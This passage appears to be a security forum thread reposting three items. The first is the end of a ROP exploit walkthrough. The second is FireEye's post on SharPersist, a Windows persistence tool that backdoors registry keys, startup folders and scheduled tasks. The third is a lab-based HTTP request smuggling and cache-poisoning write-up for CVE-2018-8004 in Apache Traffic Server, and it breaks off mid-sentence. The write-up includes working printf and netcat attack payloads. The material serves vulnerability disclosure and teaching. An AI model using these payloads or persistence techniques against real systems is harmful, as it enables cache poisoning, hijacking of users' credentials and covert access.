trashing the caller's stack frame. Messing up the caller's frame would risk stable process continuation This gadget loads the address of a "pop rax" gadget into r12 in preparation for a "workaround" that is required in order to compensate for the return address that is pushed onto the stack by the call r12 instruction in 4.). A pointer to "buf" is loaded into rax, which now points to the "calc\0" string The pointer to "calc\0" is copied to rcx which is the first argument for the subsequent API call to WinExec() in 5.). The call to r12 pushes a return address on the stack and causes a "pop rax" gadget to be executed which will pop the address off of the stack again This gadget causes the WinExec() API function to be called The call to WinExec() happens to overwrite some of our ROP chain on the stack, hence the stack pointer is adjusted by this gadget to skip the data that is "corrupted" by the call to WinExec() The original return address to main()+0x14a is loaded into rax rbx is loaded with the address of "entry_point" The original return address to main()+0x14a is restored by patching "entry_point" on the stack -> "mov qword ptr [entry_point], main+0x14a". After that, rsp is adjusted, followed by a few dummy bytes rsp is adjusted so it will slowly slide into its old position at offset 0x230 of "buf", in order to return to main() and guarantee process continuation see 10.) see 10.) see 10.) See Exploit in Action Contact Twitter Sursa: https://github.com/patois/BFS2019
      • 1
      • Upvote
  19. Threat Research SharPersist: Windows Persistence Toolkit in C# September 03, 2019 | by Brett Hawkins powershell persistence Toolkit Windows Background PowerShell has been used by the offensive community for several years now but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, Antimalware Scripting Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant’s Red Team called SharPersist. Windows Persistence During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1. Figure 1: FireEye Attack Lifecycle Diagram Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lay dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service. There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, registry, and startup folder, and there continues to be more discovered. For a more thorough list, see the MITRE ATT&CK persistence page. Figure 2: Persistence equation SharPersist Overview SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike’s “execute-assembly” functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built-in to the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden. SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page. SharPersist Persistence Techniques There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3. Technique Description Technique Switch Name (-t) Admin Privileges Required? Touches Registry? Adds/Modifies Files on Disk? KeePass Backdoor KeePass configuration file keepass No No Yes New Scheduled Task Creates new scheduled task schtask No No Yes New Windows Service Creates new Windows service service Yes Yes No Registry Registry key/value creation/modification reg No Yes No Scheduled Task Backdoor Backdoors existing scheduled task with additional action schtaskbackdoor Yes No Yes Startup Folder Creates LNK file in user startup folder startupfolder No No Yes Tortoise SVN Creates Tortoise SVN hook script tortoisesvn No Yes No Figure 3: Table of supported persistence techniques SharPersist Examples On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below. Registry Persistence The first technique that will be highlighted is the registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4. Registry Key Code (-k) Registry Key Registry Value Admin Privileges Required? Supports Env Optional Add-On (-o env)? hklmrun HKLM\Software\Microsoft\Windows\CurrentVersion\Run User supplied Yes Yes hklmrunonce HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce User supplied Yes Yes hklmrunonceex HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx User supplied Yes Yes userinit HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit Yes No hkcurun HKCU\Software\Microsoft\Windows\CurrentVersion\Run User supplied No Yes hkcurunonce HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce User supplied No Yes logonscript HKCU\Environment UserInitMprLogonScript No No stickynotes HKCU\Software\Microsoft\Windows\CurrentVersion\Run RESTART_STICKY_NOTES No No Figure 4: Supported registry keys table In the following example, we will be performing a validation of our arguments and then will add registry persistence. Performing a validation before adding the persistence is a best practice, as it will make sure that you have the correct arguments, and other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named “Test” with the value “cmd.exe /c calc.exe” in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key. Figure 5: Adding registry persistence Once the persistence needs to be removed, it can be removed using the “-m remove” argument, as shown in Figure 6. We are removing the “Test” registry value that was created previously, and then we are listing all registry values in “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” to validate that it was removed. Figure 6: Removing registry persistence Startup Folder Persistence The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called “Test.lnk” that will be placed in the current user’s startup folder and will execute “cmd.exe /c calc.exe”, shown in Figure 7. Figure 7: Performing dry-run and adding startup folder persistence The startup folder persistence can then be removed, again using the “-m remove” argument, as shown in Figure 8. This will remove the LNK file from the current user’s startup folder. Figure 8: Removing startup folder persistence Scheduled Task Backdoor Persistence The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9. Figure 9: Listing scheduled tasks that run at logon Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will successfully work and then actually execute the command as shown in Figure 10. Figure 10: Performing dry run and adding scheduled task backdoor persistence As you can see in Figure 11, the scheduled task is now backdoored with our malicious action. Figure 11: Listing backdoored scheduled task A backdoored scheduled task action used for persistence can be removed as shown in Figure 12. Figure 12: Removing backdoored scheduled task action Conclusion Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community and persistence is no exception. Windows provides multiple techniques for persistence and there will continue to be more discovered and used by security professionals and adversaries alike. This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell. Sursa: https://www.fireeye.com/blog/threat-research/2019/09/sharpersist-windows-persistence-toolkit.html
      • 2
      • Upvote
      • Thanks
  20. Security: HTTP Smuggling, Apache Traffic Server Sept 17, 2019 english and security details of CVE-2018-8004 (August 2018 - Apache Traffic Server). What is this about ? Apache Traffic Server ? Fixed versions of ATS CVE-2018-8004 Step by step Proof of Concept Set-up the lab: Docker instances Test That Everything Works Request Splitting by Double Content-Length Request Splitting by NULL Character Injection Request Splitting using Huge Header, Early End-Of-Query Cache Poisoning using Incomplete Queries and Bad Separator Prefix Attack schema HTTP Response Splitting: Content-Length Ignored on Cache Hit Attack schema Timeline See also English version (Version Française disponible sur makina corpus). estimated read time: 15 min to really more What is this about ? This article will give a deep explanation of HTTP Smuggling issues present in CVE-2018-8004. Firstly because there's currently not much informations about it ("Undergoing Analysis" at the time of this writing on the previous link). Secondly some time has passed since the official announce (and even more since the availability of fixs in v7), also mostly because I keep receiving demands on what exactly is HTTP Smuggling and how to test/exploit this type of issues, also beacause Smuggling issues are now trending and easier to test thanks for the great stuff of James Kettle (@albinowax). So, this time, I'll give you not only details but also a step by step demo with some DockerFiles to build your own test lab. You could use that test lab to experiment it with manual raw queries, or test the recently added BURP Suite Smuggling tools. I'm really a big partisan of always searching for Smuggling issues in non production environements, for legal reasons and also to avoid unattended consequences (and we'll see in this article, with the last issue, that unattended behaviors can always happen). Apache Traffic Server ? Apache Traffic Server, or ATS is an Open Source HTTP load balancer and Reverse Proxy Cache. Based on a Commercial product donated to the Apache Foundation. It's not related to Apache httpd HTTP server, the "Apache" name comes from the Apache foundation, the code is very different from httpd. If you were to search from ATS installations on the wild you would find some, hopefully fixed now. Fixed versions of ATS As stated in the CVE announce (2018-08-28) impacted ATS versions are versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. Version 7.1.4 was released in 2018-08-02 and 6.2.3 in 2018-08-04. That's the offical announce, but I think 7.1.3 contained most of the fixs already, and is maybe not vulnerable. The announce was mostly delayed for 6.x backports (and some other fixs are relased in the same time, on other issues). If you wonder about previous versions, like 5.x, they're out of support, and quite certainly vulnerable. Do not use out of support versions. CVE-2018-8004 The official CVE description is: There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS. Which does not gives a lot of pointers, but there's much more information in the 4 pull requests listed: #3192: Return 400 if there is whitespace after the field name and before the colon #3201: Close the connection when returning a 400 error response #3231: Validate Content-Length headers for incoming requests #3251: Drain the request body if there is a cache hit If you already studied some of my previous posts, some of these sentences might already seems dubious. For example not closing a response stream after an error 400 is clearly a fault, based on the standards, but is also a good catch for an attacker. Chances are that crafting a bad messages chain you may succeed at receiving a response for some queries hidden in the body of an invalid request. The last one, Drain the request body if there is a cache hit is the nicest one, as we will see on this article, and it was hard to detect. My original report listed 5 issues: HTTP request splitting using NULL character in header value HTTP request splitting using huge header size HTTP request splitting using double Content-length headers HTTP cache poisoning using extra space before separator of header name and header value HTTP request splitting using ...(no spoiler: I keep that for the end) Step by step Proof of Concept To understand the issues, and see the effects, We will be using a demonstration/research environment. If you either want to test HTTP Smuggling issues you should really, really, try to test it on a controlled environment. Testing issues on live environments would be difficult because: You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your success and errors. You may triggers errors and behaviors that you have no idea about, for example I have encountered random errors on several fuzzing tests (on test envs), unreproductible, before understanding that this was related to the last smuggling issue we will study on this article. Effects were delayed on subsequent tests, and I was not in control, at all. You may trigger errors on requests sent by other users, and/or for other domains. That's not like testing a self reflected XSS, you could end up in a court for that. Real life complete examples usually occurs with interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Nodejs, etc. You will have to understand how each actor interact with the other, and you will see it faster with a local low level network capture than blindly accross an unknown chain of agents (like for example to learn how to detect each agent on this chain). So it's very important to be able to rebuild a laboratory env. And, if you find something, this env can then be used to send detailled bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues, a working demo helps). Set-up the lab: Docker instances We will run 2 Apache Traffic Server Instance, one in version 6.x and one in version 7.x. To add some alterity, and potential smuggling issues, we will also add an Nginx docker, and an HaProy one. 4 HTTP actors, each one on a local port: 127.0.0.1:8001 : HaProxy (internally listening on port 80) 127.0.0.1:8002 : Nginx (internally listening on port 80) 127.0.0.1:8007 : ATS7 (internally listening on port 8080) 127.0.0.1:8006 : ATS6 (internally listening on port 8080), most examples will use ATS7, but you will ba able to test this older version simply using this port instead of the other (and altering the domain). We will chain some Reverse Proxy relations, Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (dummy-host7.example.com for ATS7 and dummy-host6.example.com for ATS6) Note that the localhost port mapping of the ATS and Nginx instances are not directly needed, if you can inject a request to Haproxy it will reach Nginx internally, via port 8080 of one of the ATS, and port 80 of Nginx. But that could be usefull if you want to target directly one of the server, and we will have to avoid the HaProxy part on most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on 8007. Later you can try to suceed targeting 8001, that will be harder. +---[80]---+ | 8001->80 | | HaProxy | | | +--+---+---+ [dummy-host6.example.com] | | [dummy-host7.example.com] +-------+ +------+ | | +-[8080]-----+ +-[8080]-----+ | 8006->8080 | | 8007->8080 | | ATS6 | | ATS7 | | | | | +-----+------+ +----+-------+ | | +-------+-------+ | +--[80]----+ | 8002->80 | | Nginx | | | +----------+ To build this cluster we will use docker-compose, You can the find the docker-compose.yml file here, but the content is quite short: version: '3' services: haproxy: image: haproxy:1.6 build: context: . dockerfile: Dockerfile-haproxy expose: - 80 ports: - "8001:80" links: - ats7:linkedats7.net - ats6:linkedats6.net depends_on: - ats7 - ats6 ats7: image: centos:7 build: context: . dockerfile: Dockerfile-ats7 expose: - 8080 ports: - "8007:8080" depends_on: - nginx links: - nginx:linkednginx.net ats6: image: centos:7 build: context: . dockerfile: Dockerfile-ats6 expose: - 8080 ports: - "8006:8080" depends_on: - nginx links: - nginx:linkednginx.net nginx: image: nginx:latest build: context: . dockerfile: Dockerfile-nginx expose: - 80 ports: - "8002:80" To make this work you will also need the 4 specific Dockerfiles: Docker-haproxy: an HaProxy Dockerfile, with the right conf Docker-nginx: A very simple Nginx Dockerfile with one index.html page Docker-ats7: An ATS 7.1.1 compiled from archive Dockerfile Docker-ats6: An ATS 6.2.2 compiled from archive Dockerfile Put all theses files (the docker-compose.yml and the Dockerfile-* files) into a working directory and run in this dir: docker-compose build && docker-compose up You can now take a big break, you are launching two compilations of ATS. Hopefully the next time a up will be enough, and even the build may not redo the compilation steps. You can easily add another ats7-fixed element on the cluster, to test fixed version of ATS if you want. For now we will concentrate on detecting issues in flawed versions. Test That Everything Works We will run basic non attacking queries on this installation, to check that everything is working, and to train ourselves on the printf + netcat way of running queries. We will not use curl or wget to run HTTP query, because that would be impossible to write bad queries. So we need to use low level string manipulations (with printf for example) and socket handling (with netcat -- or nc --). Test Nginx (that's a one-liner splitted for readability): printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8002 You should get the index.html response, something like: HTTP/1.1 200 OK Server: nginx/1.15.5 Date: Fri, 26 Oct 2018 15:28:20 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT Connection: keep-alive ETag: "5bd321bc-78" X-Location-echo: / X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Then test ATS7 and ATS6: printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8007 printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8006 Then test HaProxy, altering the Host name should make the transit via ATS7 or ATS6 (check the Server: header response): printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8001 printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8001 And now let's start a more complex HTTP stuff, we will make an HTTP pipeline, pipelining several queries and receiving several responses, as pipelining is the root of most smuggling attacks: # send one pipelined chain of queries printf 'GET /?cache=1 HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /?cache=2 HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /?cache=3 HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ 'GET /?cache=4 HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8001 This is pipelining, it's not only using HTTP keepAlive, because we send the chain of queries without waiting for the responses. See my previous post for detail on Keepalives and Pipelining. You should get the Nginx access log on the docker-compose output, if you do not rotate some arguments in the query nginx wont get reached by your requests, because ATS is caching the result already (CTRL+C on the docker-compose output and docker-compose up will remove any cache). Request Splitting by Double Content-Length Let's start a real play. That's the 101 of HTTP Smuggling. The easy vector. Double Content-Length header support is strictly forbidden by the RFC 7230 3.3.3 (bold added): 4 If a message is received without Transfer-Encoding and with either multiple Content-Length header fields having differing field-values or a single Content-Length header field having an invalid value, then the message framing is invalid and the recipient MUST treat it as an unrecoverable error. If this is a request message, the server MUST respond with a 400 (Bad Request) status code and then close the connection. If this is a response message received by a proxy, the proxy MUST close the connection to the server, discard the received response, and send a 502 (Bad Gateway) response to the client. If this is a response message received by a user agent, the user agent MUST close the connection to the server and discard the received response. Differing interpretations of message length based on the order of Content-Length headers were the first demonstrated HTTP smuggling attacks (2005). Sending such query directly on ATS generates 2 responses (one 400 and one 200): printf 'GET /index.html?toto=1 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Content-Length: 0\r\n'\ 'Content-Length: 66\r\n'\ '\r\n'\ 'GET /index.html?toto=2 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 The regular response should be one error 400. Using port 8001 (HaProxy) would not work, HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick. This is Critical Request Splitting, classical, but hard to reproduce in real life environment if some robust tools are used on the reverse proxy chain. So, why critical? Because you could also consider ATS to be robust, and use a new unknown HTTP server behind or in front of ATS and expect such smuggling attacks to be properly detected. And there is another factor of criticality, any other issue on HTTP parsing can exploit this Double Content-Length. Let's say you have another issue which allows you to hide one header for all other HTTP actors, but reveals this header to ATS. Then you just have to use this hidden header for a second Content-length and you're done, without being blocked by a previous actor. On our current case, ATS, you have one example of such hidden-header issue with the 'space-before-:' that we will analyze later. Request Splitting by NULL Character Injection This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after), that's also not the biggest impact, as we will use a really bad query to attack, easily detected. But I love the magical NULL (\0) character. Using a NULL byte character in a header triggers a query rejection on ATS, that's ok, but also a premature end of query, and if you do not close pipelines after a first error, bad things could happen. Next line is interpreted as next query in pipeline. So, a valid (almost, if you except the NULL character) pipeline like this one: 01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n 02 X-Something: \0 something\r\n 03 X-Foo: Bar\r\n 04 \r\n 05 GET /index.html?bar=1 HTTP/1.1\r\n 06 Host: dummy-host7.example.com\r\n 07 \r\n Generates 2 error 400. because the second query is starting with X-Foo: Bar\r\n and that's an invalid first query line. Let's test an invalid pipeline (as there'is no \r\n between the 2 queries): 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n 02 X-Something: \0 something\r\n 03 GET /index.html?bar=2 HTTP/1.1\r\n 04 Host: dummy-host7.example.com\r\n 05 \r\n It generates 1 error 400 and one 200 OK response. Lines 03/04/05 are taken as a valid query. This is already an HTTP request Splitting attack. But line 03 is a really bad header line that most agent would reject. You cannot read that as a valid unique query. The fake pipeline would be detected early as a bad query, I mean line 03 is clearly not a valid header line. GET /index.html?bar=2 HTTP/1.1\r\n != <HEADER-NAME-NO-SPACE>[:][SP]<HEADER-VALUE>[CR][LF] For the first line the syntax is one of these two lines: <METHOD>[SP]<LOCATION>[SP]HTTP/[M].[m][CR][LF] <METHOD>[SP]<http[s]://LOCATION>[SP]HTTP/[M].[m][CR][LF] (absolute uri) LOCATION may be used to inject the special [:] that is required in an header line, especially on the query string part, but this would inject a lot of bad characters in the HEADER-NAME-NO-SPACE part, like '/' or '?'. Let's try with the ABSOLUTE-URI alternative syntax, where the [:] comes faster on the line, and the only bad character for an Header name would be the space. This will also fix the potential presence of the double Host header (absolute uri does replace the Host header). 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 X-Something: \0 something\r\n 04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n 05 \r\n Here the bad header which becomes a query is line 04, and the header name is GET http with an header value of //dummy-host7.example.com/index.html?bar=2 HTTP/1.1. That's still an invalid header (the header name contains a space) but I'm pretty sure we could find some HTTP agent transferring this header (ATS is one proof of that, space character in header names were allowed). A real attack using this trick will looks like this: printf 'GET /something.html?zorg=1 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'X-Something: "\0something"\r\n'\ 'GET http://dummy-host7.example.com/index.html?replacing=1&zorg=2 HTTP/1.1\r\n'\ '\r\n'\ 'GET /targeted.html?replaced=maybe&zorg=3 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 This is just 2 queries (1st one has 2 bad header, one with a NULL, one with a space in header name), for ATS it's 3 queries. The regular second one (/targeted.html) -- third for ATS -- will get the response of the hidden query (http://dummy-host.example.com/index.html?replacing=1&zorg=2). Check the X-Location-echo: added by Nginx. After that ATS adds a thirsr response, a 404, but the previous actor expects only 2 responses, and the second response is already replaced. HTTP/1.1 400 Invalid HTTP Request Date: Fri, 26 Oct 2018 15:34:53 GMT Connection: keep-alive Server: ATS/7.1.1 Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 220 <HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request. </B></FONT> <HR> </BODY> Then: HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:34:53 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?replacing=1&zorg=2 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 Connection: keep-alive $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> And then the extra unused response: HTTP/1.1 404 Not Found Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:34:53 GMT Content-Type: text/html Content-Length: 153 Age: 0 Connection: keep-alive <html> <head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.15.5</center> </body> </html> If you try to use port 8001 (so transit via HaProxy) you will not get the expected attacking result. That attacking query is really too bad. HTTP/1.0 400 Bad request Cache-Control: no-cache Connection: close Content-Type: text/html <html><body><h1>400 Bad request</h1> Your browser sent an invalid request. </body></html> That's an HTTP request splitting attack, but real world usage may be hard to find. The fix on ATS is the 'close on error', when an error 400 is triggered the pipelined is stopped, the socket is closed after the error. Request Splitting using Huge Header, Early End-Of-Query This attack is almost the same as the previous one, but do not need the magical NULL character to trigger the end-of-query event. By using headers with a size around 65536 characters we can trigger this event, and exploit it the same way than the with the NULL premature end of query. A note on printf huge header generation with printf. Here I'm generating a query with one header containing a lot of repeated characters (= or 1 for example): X: ==============( 65 532 '=' )========================\r\n You can use the %ns form in printf to generate this, generating big number of spaces. But to do that we need to replace some special characters with tr and use _ instead of spaces in the original string: printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " " Try it against Nginx : printf 'GET_/something.html?zorg=6_HTTP/1.1\r\n'\ 'Host:_dummy-host7.example.com\r\n'\ 'X:_"%65532s"\r\n'\ 'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\ '\r\n'\ |tr " " "1"\ |tr "_" " "\ |nc -q 1 127.0.0.1 8002 I gat one error 400, that's the normal stuff. It Nginx does not like huge headers. Now try it against ATS7: printf 'GET_/something.html?zorg2=5_HTTP/1.1\r\n'\ 'Host:_dummy-host7.example.com\r\n'\ 'X:_"%65534s"\r\n'\ 'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\ '\r\n'\ |tr " " "1"\ |tr "_" " "\ |nc -q 1 127.0.0.1 8007 And after the error 400 we have a 200 OK response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header but we do not have the NULL character. But, yeah, 65000 character is very big, most actors would reject a query after 8000 characters on one line. HTTP/1.1 400 Invalid HTTP Request Date: Fri, 26 Oct 2018 15:40:17 GMT Connection: keep-alive Server: ATS/7.1.1 Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 220 <HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request. </B></FONT> <HR> </BODY> HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:40:17 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?replaced=0&cache=8 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 Connection: keep-alive $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Cache Poisoning using Incomplete Queries and Bad Separator Prefix Cache poisoning, that's sound great. On smuggling attacks you should only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning people usually understand better why splitted pipelines are dangerous. ATS support an invalid header Syntax: HEADER[SPACE]:HEADER VALUE\r\n That's not conform to RFC7230 section 3.3.2: Each header field consists of a case-insensitive field name followed by a colon (":"), optional leading whitespace, the field value, and optional trailing whitespace. So : HEADER:HEADER_VALUE\r\n => OK HEADER:[SPACE]HEADER_VALUE\r\n => OK HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n => OK HEADER[SPACE]:HEADER_VALUE\r\n => NOT OK And RFC7230 section 3.2.4 adds (bold added): No whitespace is allowed between the header field-name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject any received request message that contains whitespace between a header field-name and colon with a response code of 400 (Bad Request). A proxy MUST remove any such whitespace from a response message before forwarding the message downstream. ATS will interpret the bad header, and also forward it without alterations. Using this flaw we can add some headers in our request that are invalid for any valid HTTP agents but still interpreted by ATS like: Content-Length :77\r\n Or (try it as an exercise) Transfer-encoding :chunked\r\n Some HTTP servers will effectively reject such message with an error 400. But some will simply ignore the invalid header. That's the case of Nginx for example. ATS will maintain a keep-alive connection to the Nginx Backend, so we'll use this ignored header to transmit a body (ATS think it's a body) that is in fact a new query for the backend. And we'll make this query incomplete (missing a crlf on end-of-header) to absorb a future query sent to Nginx. This sort of incomplete-query filled by the next coming query is also a basic Smuggling technique demonstrated 13 years ago. 01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 Cache-Control: max-age=200\r\n 04 X-info: evil 1.5 query, bad CL header\r\n 05 Content-Length :117\r\n 06 \r\n 07 GET /index.html?INJECTED=1 HTTP/1.1\r\n 08 Host: dummy-host7.example.com\r\n 09 X-info: evil poisoning query\r\n 10 Dummy-incomplete: Line 05 is invalid (' :'). But for ATS it is valid. Lines 07/08/09/10 are just binary body data for ATS transmitted to backend. For Nginx: Line 05 is ignored. Line 07 is a new request (and first response is returned). Line 10 has no "\r\n". so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS ... Attack schema [ATS Cache poisoning - space before header separator + backend ignoring bad headers] Innocent Attacker ATS Nginx | | | | | |--A(1A+1/2B)-->| | * Issue 1 & 2 * | | |--A(1A+1/2B)-->| * Issue 3 * | | |<-A(404)-------| | | | [1/2B] | |<-A(404)-------| [1/2B] | |--C----------->| [1/2B] | | |--C----------->| * ending B * | | [*CP*]<--B(200)----| | |<--B(200)------| | |--C--------------------------->| | |<--B(200)--------------------[HIT] | 1A + 1/2B means request A + an incomplete query B A(X) : means X query is hidden in body of query A CP : Cache poisoning Issue 1 : ATS transmit 'header[SPACE]: Value', a bad HTTP header. Issue 2 : ATS interpret this bad header as valid (so 1/2B still hidden in body) Issue 3 : Nginx encounter the bad header but ignore the header instead of sending an error 400. So 1/2B is discovered as a new query (no Content-length) request B contains an incomplete header (no crlf) ending B: the 1st line of query C ends the incomplete header of query B. all others headers are added to the query. C disappears and mix C HTTP credentials with all previous B headers (cookie/bearer token/Host, etc.) Instead of cache poisoning you could also play with the incomplete 1/B query and wait for the Innocent query to finish this request with HTTP credentials of this user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will simply demonstrate cache poisoning. Run this attack: for i in {1..9} ;do printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ 'X-info: evil 1.5 query, bad CL header\r\n'\ 'Content-Length :117\r\n'\ '\r\n'\ 'GET /index.html?INJECTED='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'X-info: evil poisoning query\r\n'\ 'Dummy-unterminated:'\ |nc -q 1 127.0.0.1 8007 done It should work, Nginx adds an X-Location-echo header in this lab configuration, where we have the first line of the query added on the response headers. This way we can observe that the second response is removing the real second query first line and replacing it with the hidden first line. On my case the last query response contained: X-Location-echo: /index.html?INJECTED=3 But this last query was GET /index.html?INJECTED=9. You can check the cache content with: for i in {1..9} ;do printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 done In my case I found 6 404 (regular) and 3 200 responses (ouch), the cache is poisoned. If you want to go deeper in Smuggling understanding you should try to play with wireshark on this example. Do not forget to restart the cluster to empty the cache. Here we did not played with a C query yet, the cache poisoning occurs on our A query. Unless you consider the /does-not-exists.html?cache='$i' as C queries. But you can easily try to inject a C query on this cluster, where Nginx as some waiting requests, try to get it poisoned with /index.html?INJECTED=3 responses: for i in {1..9} ;do printf 'GET /innocent-C-query.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 done This may give you a touch on real world exploitations, you have to repeat the attack to obtain something. Vary the number of servers on the cluster, the pools settings on the various layers of reverse 